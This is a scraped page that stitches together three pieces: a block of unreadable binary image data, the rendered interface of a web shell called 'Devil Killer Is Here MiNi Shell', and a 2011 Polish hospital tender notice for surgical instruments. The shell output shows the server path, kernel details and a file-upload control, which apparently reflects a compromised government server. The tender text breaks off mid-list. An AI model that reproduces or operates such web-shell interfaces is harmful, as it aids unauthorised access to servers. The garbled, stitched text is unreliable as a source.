JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111216/334395-N-2011.html

<p class="kh_header"><b>Łódź: Sprawa nr 168/11. Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 193 000 euro na dostawę wielorazowych narzędzi chirurgicznych dla Oddziału Ginekologii Onkologicznej  dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi</b><br>
<b>Numer ogłoszenia: 334395 - 2011; data zamieszczenia: 16.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Mikołaja Kopernika , ul. Pabianicka 62, 93-513 Łódź, woj. łódzkie, tel. 042 6895910, 6895912, faks 042 6895911.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopernik.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprawa nr 168/11. Postępowanie o udzielenie zamówienia publicznego prowadzonego w trybie przetargu nieograniczonego o wartości powyżej 14 000 euro, nie przekraczającej 193 000 euro na dostawę wielorazowych narzędzi chirurgicznych dla Oddziału Ginekologii Onkologicznej  dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa wielorazowych narzędzi chirurgicznych wielorazowego użytku dla Oddziału Ginekologii Onkologicznej  wyszczególnionych ilościowo i asortymentowo oraz opisanych w załączniku nr 2 do SIWZ.

2.	Przedmiot zamówienia został podzielony na 6 pakietów:
Pakiet nr 1 - Zestaw DUŻY BRZUCH;
Pakiet nr 2 - Zestaw MAŁY BRZUCH;
Pakiet nr 3 - Zestaw do mamectomii;
Pakiet nr 4 - Zestaw do tumorectomii;
Pakiet nr 5 - Zestaw do abrazji;
Pakiet nr 6 - Inne narzędzia;
Zamawiający wymaga, aby wszystkie zaoferowane narzędzia posiadały gładkie powierzchnie, bez porów, pęknięć, wyżłobień..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do przetargu (tj. przed złożeniem ofert) Wykonawca jest obowiązany wnieść wadium.  Wadium należy wpłacić przelewem na konto Zamawiającego:
PKO S.A. V O. Łódź 78 1240 1545 1111 0000 1166 9960
do dnia otwarcia ofert z zaznaczeniem, którego pakietu dotyczy oraz z opisem: 

Wadium na przetarg nieograniczony na dostawę wielorazowych narzędzi chirurgicznych dla Oddziału Ginekologii Onkologicznej  dla Wojewódzkiego Szpitala Specjalistycznego im. M. Kopernika w Łodzi, 
nr sprawy 168/11.

Wadium podzielone jest na 6 części. 

W związku z powyższym Wykonawca zobowiązany jest wnieść wadium na poszczególne pakiety w następujących wysokościach (Nr pakietu	- Wadium):
1.-1 100,00 zł; 
2.-500,00 zł ;
3.-170,00 zł ;
4.-220,00 zł ;
5.-180,00 zł ;
6.-200,00 zł ;
SUMA:	2 370,00 zł ;


Oferta zostanie uznana za zabezpieczoną, jeżeli środki pieniężne z tytułu wadium faktycznie wpłyną na konto Zamawiającego przed upływem terminu składania ofert, a w przypadku zabezpieczenia oferty inna forma wadium oryginał dowodu wniesienia wadium będzie załączony do oferty.

2.	Wadium może być wnoszone:
a) w pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000r. O utworzeniu polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 ze zm.) 
3.	Jeżeli  wadium  będzie  wniesione  w  formie  gwarancji  albo  poręczenia,  to  jego oryginał musi  być  załączony  do  oferty. Wadium wnoszone w pieniądzu wpłaca się przelewem  na rachunek bankowy wskazany przez Zamawiającego w pkt. 1. 
4.	Wykonawca, który nie zabezpieczy oferty właściwą formą wadium podlega wykluczeniu z postępowania, a jego oferta zostanie uznana za odrzuconą w trybie art. 24 ust. 4 Ustawy.
5.	Zamawiający zobowiązany jest zwrócić wadium na warunkach określonych w art. 46 ust. 1, 1a, 2 i 4 Ustawy.
6.	Wykonawca traci wadium na rzecz Zamawiającego, jeżeli zaistnieje którakolwiek z przesłanek wymienionych w art. 46 ust. 4a i 5 Ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania  warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania  warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania  warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania  warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Z uwagi na charakter przedmiotu zamówienia Zamawiający nie opisuje sposobu dokonywania oceny spełniania  warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga, aby zaoferowane wyroby medyczne spełniały wymogi dopuszczenia do obrotu i użytkowania zgodnie z ustawą z dnia 20.05.2010r. o wyrobach medycznych (Dz. U. z 2010r. nr 107, poz. 679) w tym zakresie Zamawiający wymaga złożenia do siedziby Zamawiającego: 

w zakresie wyrobów medycznych wprowadzonych do obrotu i używania do 17.09.2010r. włącznie oraz w zakresie wyrobów medycznych wprowadzonych do obrotu i używania po 17.09.2010r.: 

a)	Deklarację Zgodności Producenta - dla wyrobów medycznych wszystkich klas; 
b)	Certyfikat jednostki notyfikowanej biorącej udział przy ocenie zgodności wyrobu medycznego (Certyfikaty CE) - dla klasy wyrobu I sterylna, I z funkcją pomiarową, IIa, IIb, III;
c)	dla wyrobów medycznych klasy IIa, IIb lub III - oświadczenie wytwórcy lub autoryzowanego przedstawiciela wystawionego po przeprowadzeniu odpowiedniej dla danego wyrobu procedury oceny zgodności i potwierdzającego, że wyrób spełnia odnoszące się do niego wymagania zasadnicze, lub wskazujące, które z wymagań zasadniczych nie zostały spełnione, z podaniem przyczyn;
d)	w przypadku wyrobów medycznych wprowadzonych do obrotu i używania do 17.09.2010r. włącznie wniosek o przeniesienie danych do bazy danych gromadzonych przez Prezesa Urzędu na informatycznych nośnikach danych zgodnie z art. 64 ust. 1 ustawy o wyrobach medycznych z dnia 17.09.2010r. (Dz. U. z 2010r. nr 107 poz. 679)
e)	w przypadku wytwórców i autoryzowanych przedstawicieli mających miejsce zamieszkania lub siedzibę na terytorium Rzeczypospolitej Polskiej - zgłoszenie wyrobu do Prezesa Urzędu (obowiązek złożenia kopii zgłoszenia do Prezesa Urzędu dotyczy wyłącznie wytwórców i autoryzowanych przedstawicieli, w przypadkach wskazanych w ustawie) lub, w przypadku dystrybutorów i importerów mających miejsce zamieszkania lub siedzibę na terytorium Rzeczypospolitej Polskiej, którzy wprowadzili na terytorium Rzeczypospolitej Polskiej wyrób przeznaczony do używania na tym terytorium - powiadomienie o tym wprowadzeniu Prezesa Urzędu (obowiązek złożenia kopii zgłoszenia do prezesa Urzędu dotyczy wyłącznie dystrybutorów i importerów, w przypadkach wskazanych w ustawie).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopernik.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WOJEWÓDZKI  SZPITAL SPECJALISTYCZNY
 im. M. Kopernika w Łodzi
ul. Pabianicka 62
93-513  Łódź.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.12.2011 godzina 10:00, miejsce: WOJEWÓDZKI  SZPITAL SPECJALISTYCZNY
 im. M. Kopernika w Łodzi
ul. Pabianicka 62
93-513  Łódź
KANCELARIA SZPITALA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET NR 1 Zestaw DUŻY BRZUCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Pinceta chirurgiczna 1 x 2 zęby dł. 154 mm
2) Atraumatyczna pinceta naczyniowa typu Ultra - Luight  prosta dł. 200 mm
3) Hak operacyjny typu Richardson rozm. Branszy 47 x 21 mm dł. 240 mm
4) Hak operacyjny  typu Richardson - Eastman zestaw 38 x 37 mm 64 x 43 mm dł.270 mm 22 x 21 mm 29 x 30mm dł. 250 mm
5) Hak operacyjny typu .Langenbeck 40x10mm dł. 230mm
6) Zestaw.wzierników pochwowych typu. Kallmorgen rozmiar 95x39mm dł.200
7) Sonda typu. Payr zakrzywiona śr.5/dł 195mm
8) Imadło chirurgiczne typu. Hegar bez żłobienia dł. 205mm
9) Zacisk opatrunkowy typu backhaus dł 110mm
10) Kleszcyki naczyniowe typu. Rochester-pean zakrzywione dł. 160mm
11) Kleszczyki preparacyjne typu. Wikstroem dł 210mm
12) Kleszczyki naczyniowe typu. Chaput 2x3zęby dł. 125mm
13) Kleszczyki hemoridowe typu. Heywood-smitha dł. 215mm
14) Zacisk jelitowy typu. Kocher proste dł. 250mm
15) Zacisk jelitowy typu. Kocher zakrzywiony dł. 250mm
16) Imadło chirurgiczne typu. Hegar-mayo dł. 185mm
17) Nożyczki preparacyjne typu. Metzenbaum zakrzywione dł. 180mm
18) Nożyczki chirurgiczne zakrzyw. T O 145mm
19) Szczypce opatrunkowe typu. Maier bez zamka, proste dł. 265mm
20) Naczynie laborator.2,5l ze stali nierdzewnej
21) Kontener pracujący w systemie otwartym składającym się z: Wanna Kontenera o wymiarach 592 x 274 x 120 mm, aluminiowy, pokrywa ze sztucznego polimeru z filtrami na oki. 5000 cykli sterylizacji, przeźroczysta, kosz na narzędzia o wymiarach 540 x 253 x 106mm perforowany wykonany z jednego arkusza blachy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET NR 2 - Zestaw MAŁY BRZUCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Sonda rowkowa dł. 130mm
2) Rozwieracz typu. Weitlaner ostry 3x4zęby dł 130mm
3) Hak op.us-army 26x15 43x15-22x15 39x15
4) Hak brzuszny mikulicz 147x50mm
5) Hak operacyj.Richardson-eastman zestaw
6) Klesz. Hemoroidowe heywood-smitha 215mm
7) Zacisk.jelit.atr.Kocher zakrz.220mm
8) Imadło chir. Hegar-mayo 185mm
9) Nożyczki chir. Zakrzywione. tępo ostre dł. 145mm
10) Nożyczki preparacyjne typu. Metzenbaum zakrzywione dł. 180mm
11) Kleszczyki naczyniowe CRILE zakrzyw. 160mm
12) Spinak do serwet typ. Backhaus dł. 110
13) Szczypce opatrunkowe typu. Maier bez zamka, proste dł. 265mm
14) Naczynie laborator. 1,0l  ze stali nierdzewnej
15) Kontener pracujący w systemie otwartym składającym się z: Wanna Kontenera o wymiarach 470 x 274 x 120 mm, aluminiowy, pokrywa ze sztucznego polimeru z filtrami na ok. 5000 cykli sterylizacji, przeźroczysta, kosz na narzędzia o wymiarach 406 x 253 x 106mm perforowany wykonany z jednego arkusza blachy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET NR 3 - Zestaw do mamectomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Hak operacyjny typu. Richardson-eastman dł 270mm
2) Hak operacyjny typu. Kocher rozmiar bransz 23x8mm
3) Hak operacyjny typu. Volkmann 4zębny. Ostry dł. 220mm
4) Uchwyt skalpela nr. 4  135mm
5) Pinceta anatomiczna dł. 200mm
6) Pinceta chirurgiczna 1x2zęby dł. 145mm
7) Pinceta atraumatyczna.szczęka szer.1,5mm dł 200mm
8) Kleszczyki naczyniowe typu. Crile zakrzywione dł. 160mm
9) Zacisk opatrunkowy typu Backhaus dł 110mm
10) Imadło chirurgiczne typu. Hegar-mayo dł.185mm
11) Nożyczki preparacyjne typu. Metzenbaum zakrzywione dł. 200mm
12) Nożyczki preparacyjne typu. Metzenbaum zakrzywione dł. 145mm
13) Kleszczyki preparacyjne typu. Overholt-geissend fig. 0 195mm
14) Kleszczyki nacz. Kocher-ochsn pros.1x2z.280mm
15) Szczypce opatrunkowe typu. Maier bez zamka,proste dł 265mm
16) Szalka labolator. 2,5l
17) Nożyczki chir.typu. Cooper zakrzyw. Tępo tępe 165mm
18) Kontener pracujący w systemie otwartym składającym się z: Wanna Kontenera o wymiarach 300 x 274 x 120 mm, aluminiowy, pokrywa ze sztucznego polimeru z filtrami na ok. 5000 cykli sterylizacji, przeźroczysta, kosz na narzędzia o wymiarach 243 x 253 x 106mm perforowany wykonany z jednego arkusza blachy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET NR 4 - Zestaw do tumorectomii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Hak operacyjny typu. Volkmann 3zęby ostry
2) Hak operacyjny typu.Farabeuf 23x16 28x16-20x16 24x16 dł150mm
3) Uchwyt skolpela nr.4 135mm
4) Pinceta chirurgiczna 1x2zęby dł. 145mm
5) Zacisk opatrunkowy typu. Backhaus dł 110mm
6) Kleszcyki naczyniowe typu. Crile zakrzywione dł. 140mm
7) Kleszcyki płucne typu. Allisthoms dł. 220mm
8) Kleszczyki naczyniowe typu. Kocher-ochsner,proste 1x2zęby dł. 280mm
9) Imadło chir. Hegar-mayo 185mm
10) Nożyczki preparacyjne typu. Metzenbaum zakrzywione dł. 200mm
11) Nożyczki preparacyjne typu. Metzenbaum zakrzywione dł.145mm
12) Szczypce opatrunkowe typu. Maier bez zamka, proste dł 265mm
13) Naczynie labolator. 2,5l ze stali nierdzewnej
14) Kontener pracujący w systemie otwartym składającym się z: Wanna Kontenera o wymiarach 300 x 274 x 120 mm, aluminiowy, pokrywa ze sztucznego polimeru z filtrami na ok. 5000 cykli sterylizacji, przeźroczysta, kosz na narzędzia o wymiarach 243 x 253 x 106mm perforowany wykonany z jednego arkusza blachy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.90.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5 - Zestaw do abrazji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Rozszerzacz maciczny Hegara pojedyn. 1mm
2) Rozszerzacz maciczny Hegara pojedyn. 2mm
3) Rozszerzacz maciczny Hegara pojedyn. 3mm
4) Rozszerzacz maciczny Hegara pojedyn. 4mm
5) Rozszerzacz maciczny Hegara pojedyn. 5mm
6) Rozszerzacz maciczny Hegara pojedyn. 6mm
